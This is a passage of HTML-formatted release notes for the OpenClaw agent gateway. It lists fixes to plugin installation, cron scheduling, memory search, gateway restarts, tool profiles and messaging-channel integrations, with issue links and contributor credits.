<p>Feishu: include media <code>file_key</code> and <code>image_key</code> values in inbound dedupe so reused message IDs still process distinct media attachments while true retries stay suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357858578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75057" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75057/hovercard" href="https://github.com/openclaw/openclaw/issues/75057">#75057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
<p>Control UI/Gateway: avoid full session-list reloads for locally applied message-phase session updates, carry known session keys through transcript-file update events, and defer media provider listing when explicit generation model config is present. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369867512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76236" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76236/hovercard" href="https://github.com/openclaw/openclaw/issues/76236">#76236</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369693147" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76203" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76203/hovercard" href="https://github.com/openclaw/openclaw/issues/76203">#76203</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369600766" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76188" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76188/hovercard" href="https://github.com/openclaw/openclaw/issues/76188">#76188</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369131982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76107" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76107/hovercard" href="https://github.com/openclaw/openclaw/issues/76107">#76107</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369510539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76166" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76166/hovercard" href="https://github.com/openclaw/openclaw/issues/76166">#76166</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Install/update: prune the obsolete <code>plugin-runtime-deps</code> state directory during packaged postinstall so upgrades from pre-2026.5.2 releases reclaim old bundled-plugin dependency caches without touching external plugin installs.</p>
</li>
<li>
<p>Auto-reply/queue: treat reset-triggered <code>/new</code> and <code>/reset</code> turns as interrupt runs across active-run queue handling, so steer/followup modes cannot delay a fresh session behind existing work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348103885" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74093" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74093/hovercard" href="https://github.com/openclaw/openclaw/issues/74093">#74093</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348397494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74144" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74144/hovercard" href="https://github.com/openclaw/openclaw/pull/74144">#74144</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ruji9527/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ruji9527">@ruji9527</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yelog/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yelog">@yelog</a>.</p>
</li>
<li>
<p>Cron: persist repaired startup runtime state back to <code>jobs-state.json</code> so a valid future <code>nextRunAtMs</code> with missing <code>updatedAtMs</code> no longer triggers repeated external health-check repairs after Gateway restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370927215" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76461" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76461/hovercard" href="https://github.com/openclaw/openclaw/issues/76461">#76461</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Cron: preserve manual <code>cron.run</code> IDs in <code>cron.runs</code> history so manual run acknowledgements can be correlated with finished run records. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370150294" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76276" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76276/hovercard" href="https://github.com/openclaw/openclaw/issues/76276">#76276</a>.</p>
</li>
<li>
<p>CLI/devices: request <code>operator.admin</code> for <code>openclaw devices approve &lt;requestId&gt;</code> only when the exact pending device request would mint or inherit admin-scoped operator access, while keeping lower-scope approvals on the pairing scope.</p>
</li>
<li>
<p>Memory/embedding: broaden the embedding reindex retry classifier to include transient socket-layer errors (<code>fetch failed</code>, <code>ECONNRESET</code>, <code>socket hang up</code>, <code>UND_ERR_*</code>, <code>closed</code>) so memory reindex survives provider network hiccups instead of aborting mid-run. Related <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162666762" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56815" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56815/hovercard" href="https://github.com/openclaw/openclaw/issues/56815">#56815</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4065430828" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44166" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44166/hovercard" href="https://github.com/openclaw/openclaw/issues/44166">#44166</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370365109" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76311" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76311/hovercard" href="https://github.com/openclaw/openclaw/pull/76311">#76311</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/buyitsydney/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/buyitsydney">@buyitsydney</a>.</p>
</li>
<li>
<p>Memory/sessions: keep rotated and deleted transcripts (<code>.jsonl.reset.&lt;iso&gt;</code> / <code>.jsonl.deleted.&lt;iso&gt;</code>) searchable by indexing archive content, mapping archive hits back to live transcript stems, emitting transcript update events on archive rotation, and bypassing incremental delta thresholds for one-shot archive mutations while keeping backups and compaction checkpoints opaque. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4157084622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56131" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56131/hovercard" href="https://github.com/openclaw/openclaw/issues/56131">#56131</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/buyitsydney/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/buyitsydney">@buyitsydney</a>.</p>
</li>
<li>
<p>Memory/search: keep sqlite-vec optional in packaged installs and point missing-extension recovery at the valid <code>agents.defaults.memorySearch.store.vector.extensionPath</code> setting. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/willemsej/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/willemsej">@willemsej</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway: keep directly requested plugin tools invokable under restrictive tool profiles while preserving explicit deny lists and the HTTP safety deny list, preventing catalog/invoke mismatches that surface as "Tool not available". Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</p>
</li>
<li>
<p>Gateway/update: allow beta binaries to refresh gateway services when the config was last written by the matching stable release version, avoiding false newer-config downgrade blocks during beta channel updates.</p>
</li>
<li>
<p>Channels: keep Matrix and Mattermost bundled in the core package instead of advertising external npm installs before those channels are cut over. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Bonjour: disable LAN mDNS advertising after a repeated stuck-announcing recovery instead of repeatedly restarting ciao and saturating the Gateway event loop.</p>
</li>
<li>
<p>Channels/setup: label installable channel picker hints as remote npm installs and hide remote install hints for bundled plugins that already ship with OpenClaw.</p>
</li>
<li>
<p>CLI/update: refuse package updates launched from the active gateway process tree before stopping the managed Gateway service, avoiding self-terminated in-lane updates that leave old Gateway code running. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364875425" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75691" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75691/hovercard" href="https://github.com/openclaw/openclaw/issues/75691">#75691</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366736571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75819" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75819/hovercard" href="https://github.com/openclaw/openclaw/pull/75819">#75819</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ai-hpc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ai-hpc">@ai-hpc</a>.</p>
</li>
<li>
<p>CLI/plugins: stop treating the non-plugin <code>auth</code> command root as a bundled plugin id, so restrictive <code>plugins.allow</code> configs no longer tell users to add stale <code>auth</code> plugin entries.</p>
</li>
<li>
<p>Doctor/plugins: update configured plugin installs whose stale manifests still declare channels without <code>channelConfigs</code>, so beta upgrades repair old Discord-style package payloads during <code>doctor --fix</code>.</p>
</li>
<li>
<p>Doctor/plugins: repair configured external plugin installs whose persisted install record points at a missing package directory, so upgrades reconcile phantom npm metadata before plugin runtime validation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Active Memory: keep non-empty <code>memory_search</code> results from being fast-failed as empty when debug telemetry reports zero hits.</p>
</li>
<li>
<p>Active Memory: preserve the target agent context when building embedded recall plugin tools so <code>memory_search</code> and <code>memory_get</code> stay available for explicit recall sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370503514" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76343/hovercard" href="https://github.com/openclaw/openclaw/issues/76343">#76343</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Countermarch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Countermarch">@Countermarch</a>.</p>
</li>
<li>
<p>Plugins/externalization: repair missing configured plugin installs from npm by default, reserve ClawHub downloads for explicit <code>clawhubSpec</code> metadata, and cover agent-runtime/env-selected plugin repair. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/install: allow official catalog-matched npm channel plugins such as Feishu to pass the trusted install scanner path while keeping spoofed package names blocked. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Tools/llm-task: keep JSON-only embedded model runs from tripping inherited tool allowlists when tools are intentionally disabled, while preserving runtime <code>toolsAllow</code> failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347559374" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74019" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74019/hovercard" href="https://github.com/openclaw/openclaw/issues/74019">#74019</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Tools/profiles: make <code>tools.profile: "full"</code> grant all tools including optional plugin tools such as browser, so the full profile no longer silently drops plugin-provided tools that require an explicit allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371092864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76507" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76507/hovercard" href="https://github.com/openclaw/openclaw/issues/76507">#76507</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Feishu: keep timeout env parsing separate from the HTTP client wrapper so package security scans no longer report a false env-harvesting hit during install. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Upgrade/config: validate configured web-search providers and statically suppressed model/provider pairs against the active plugin set at config load, so stale plugin state fails loud before runtime fallback.</p>
</li>
<li>
<p>Status/update: resolve beta update-channel checks from the installed version when config still says <code>stable</code>, and let <code>status --deep</code> reuse live gateway channel credential state instead of warning on command-path-only token misses.</p>
</li>
<li>
<p>Doctor/plugins: preserve unmanaged third-party plugin <code>node_modules</code> during <code>doctor --fix</code>, while still pruning OpenClaw-managed runtime dependency caches.</p>
</li>
<li>
<p>Gateway/restart: add <code>openclaw gateway restart --force</code> and <code>--wait &lt;duration&gt;</code>, log active task run IDs before restart deferral timers, and report timeout restarts as explicit forced restarts.</p>
</li>
<li>
<p>Discord: persist slash-command deploy hashes across process restarts so unchanged command sets skip redeploy and avoid restart-loop 429s.</p>
</li>
<li>
<p>Providers/LM Studio: normalize binary <code>off</code>/<code>on</code> reasoning metadata from Gemma 4 and other local models to LM Studio's accepted OpenAI-compatible <code>reasoning_effort</code> values.</p>
</li>
<li>
<p>Plugins/externalization: keep official external install docs, update examples, and live Codex npm checks on default npm tags instead of <code>@beta</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/externalization: keep ACPX, Google Chat, and LINE publishable plugin dist trees out of the core npm package file list.</p>
</li>
<li>
<p>Plugins/ClawHub: fall back to version metadata when the artifact resolver route is missing and keep the Docker ClawHub fixture aligned with npm-pack artifact resolution, avoiding false version-not-found failures during plugin install validation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Providers/openai-codex: honor <code>providerConfig.baseUrl</code> in the dynamic-model synthesis fallback so codex providers configured with a custom upstream (for example a forwarding proxy) no longer silently bypass the configured URL when the registry has no template row to clone for the requested model id. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370800895" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76428" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76428/hovercard" href="https://github.com/openclaw/openclaw/pull/76428">#76428</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/arniesaha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/arniesaha">@arniesaha</a>.</p>
</li>
<li>
<p>Status/channels: show configured channels in <code>openclaw status</code> and config-only <code>openclaw channels status</code> output even when the Gateway is unreachable, avoiding empty Channels tables on WSL and other no-Gateway paths. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/ClawHub: explain unavailable explicit ClawHub ClawPack artifact downloads with a temporary npm install hint while ClawHub artifact routing rolls out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Media: accept home-relative <code>MEDIA:~/...</code> attachment paths while preserving existing file-read policy, traversal checks, and media type validation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346056562" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73796" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73796/hovercard" href="https://github.com/openclaw/openclaw/issues/73796">#73796</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fabkury/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fabkury">@fabkury</a>.</p>
</li>
<li>
<p>Onboarding/search: install official external web-search plugins such as Brave before saving provider config, and make doctor repair reconcile selected external search providers whose npm payload is missing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/externalization: add official npm-first catalogs for externalized channel, provider, and generic plugins, keep unpublished ACPX/Google Chat/LINE bundled, and make missing-plugin repair honor npm-first metadata while ClawHub pack files roll out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/update: detect tracked plugin install records whose package directories disappeared during <code>openclaw update</code>, reinstall them before normal plugin updates, and fail the update if any install record still points at missing disk payloads.</p>
</li>
<li>
<p>Plugins/registry: hash manifest and package metadata when validating persisted plugin registries so fast same-size rewrites cannot leave stale plugin metadata trusted.</p>
</li>
<li>
<p>Plugins/registry: canonicalize install-record provenance paths before trust diagnostics, so npm plugins installed under symlinked temp/state roots no longer warn as untracked local code.</p>
</li>
<li>
<p>Plugins/install: let official external Discord reinstall requests pass the invalid-config guard and run stale-channel repair, so upgrades can recover missing external plugin state directly.</p>
</li>
<li>
<p>CLI/infer: reject local <code>codex/*</code> one-shot model probes before simple-completion dispatch and point operators at the Codex app-server runtime path instead of ending with an empty-output error.</p>
</li>
<li>
<p>Agents/sessions: preserve terminal lifecycle state when final run metadata persists from a stale in-memory snapshot, preventing <code>main</code> sessions from staying stuck as running after completed or timed-out turns.</p>
</li>
<li>
<p>Gateway/CLI: make <code>openclaw gateway start</code> repair stale managed service definitions that point at old OpenClaw versions, missing binaries, or temporary installer paths before starting.</p>
</li>
<li>
<p>Heartbeat/scheduler: make heartbeat phase scheduling active-hours-aware so the scheduler seeks forward to the first in-window phase slot instead of arming timers for quiet-hours slots and relying solely on the runtime guard. Non-UTC <code>activeHours.timezone</code> values (e.g. <code>Asia/Shanghai</code>) now correctly influence when the next heartbeat timer fires, avoiding wasted quiet-hours ticks and long dormant gaps after gateway restarts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363246759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75487/hovercard" href="https://github.com/openclaw/openclaw/issues/75487">#75487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Providers/Arcee AI: mark Trinity Large Thinking as tool-incompatible so main-session runs use the same text-only request shape that made subagent runs recover, avoiding the remaining main-session response-shape mismatch after the <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221668426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62848/hovercard" href="https://github.com/openclaw/openclaw/issues/62848">#62848</a> transport failover fix. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221687645" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62851" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62851/hovercard" href="https://github.com/openclaw/openclaw/issues/62851">#62851</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221667245" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62847" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62847/hovercard" href="https://github.com/openclaw/openclaw/issues/62847">#62847</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221668426" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62848" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62848/hovercard" href="https://github.com/openclaw/openclaw/issues/62848">#62848</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adam-Researchh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adam-Researchh">@Adam-Researchh</a>.</p>
</li>
<li>
<p>Status: show the <code>openai-codex</code> OAuth profile for <code>openai/gpt-*</code> sessions running through the native Codex runtime instead of reporting auth as unknown. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369662899" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76197" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76197/hovercard" href="https://github.com/openclaw/openclaw/pull/76197">#76197</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</p>
</li>
<li>
<p>Gateway: avoid repeated plugin tool descriptor config hashing so large runtime configs do not block reply startup and trigger reconnect/timeouts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367851232" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75944" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75944/hovercard" href="https://github.com/openclaw/openclaw/issues/75944">#75944</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</p>
</li>
<li>
<p>Plugins/externalization: keep diagnostics ClawHub packages and persisted bundled-plugin relocation on npm-first install metadata for launch, and omit Discord from the core package now that its external package is published. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Setup/TUI: bound the Terminal hatch bootstrap run so a stalled provider request times out instead of leaving first-run hatching stuck behind the watchdog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369916791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76241/hovercard" href="https://github.com/openclaw/openclaw/pull/76241">#76241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</p>
</li>
<li>
<p>Cron/CLI runtimes: route isolated cron jobs through configured per-agent CLI runtimes only when the resolved model provider is compatible, so OpenAI job overrides no longer inherit a mismatched Claude CLI backend. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</p>
</li>
<li>
<p>Plugins/Codex: allow the official npm Codex plugin to install without the unsafe-install override, keep <code>/codex</code> command ownership, and cover the real npm Docker live path through managed <code>.openclaw/npm</code> dependencies plus uninstall failure proof.</p>
</li>
<li>
<p>Gateway/status: add concrete service, config, listener-owner, and log collection next steps when gateway probes fail and Bonjour finds no local gateway, so frozen or port-conflict reports include the data needed for root-cause triage. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4088411746" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49012" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49012/hovercard" href="https://github.com/openclaw/openclaw/issues/49012">#49012</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Codex harness: forward OpenClaw workspace bootstrap files such as <code>SOUL.md</code> through native Codex config instructions while leaving <code>AGENTS.md</code> to Codex project-doc discovery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370133135" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76273" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76273/hovercard" href="https://github.com/openclaw/openclaw/issues/76273">#76273</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zknicker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zknicker">@zknicker</a>.</p>
</li>
<li>
<p>Parallels/Windows update smoke: escape the stale post-swap import regex in the generated PowerShell script so expected <code>ERR_MODULE_NOT_FOUND</code> update handoffs continue to post-update health checks. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362062644" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75315" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75315/hovercard" href="https://github.com/openclaw/openclaw/pull/75315">#75315</a>)</p>
</li>
<li>
<p>Slack: allow draft preview streaming in top-level DMs when <code>replyToMode</code> is <code>off</code> while keeping Slack native streaming and assistant thread status gated on reply threads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160487114" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56480" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56480/hovercard" href="https://github.com/openclaw/openclaw/issues/56480">#56480</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4161016971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56544" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56544/hovercard" href="https://github.com/openclaw/openclaw/pull/56544">#56544</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HangGlidersRule/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HangGlidersRule">@HangGlidersRule</a>.</p>
</li>
<li>
<p>Control UI/chat: remove the delete-confirm popover outside-click listener on every dismiss path, so Cancel, Delete, outside clicks, and same-button toggles no longer leave stale document listeners behind. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363970635" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75590" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75590/hovercard" href="https://github.com/openclaw/openclaw/pull/75590">#75590</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306731173" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69982" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69982/hovercard" href="https://github.com/openclaw/openclaw/pull/69982">#69982</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ricardo-M-L/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ricardo-M-L">@Ricardo-M-L</a>.</p>
</li>
<li>
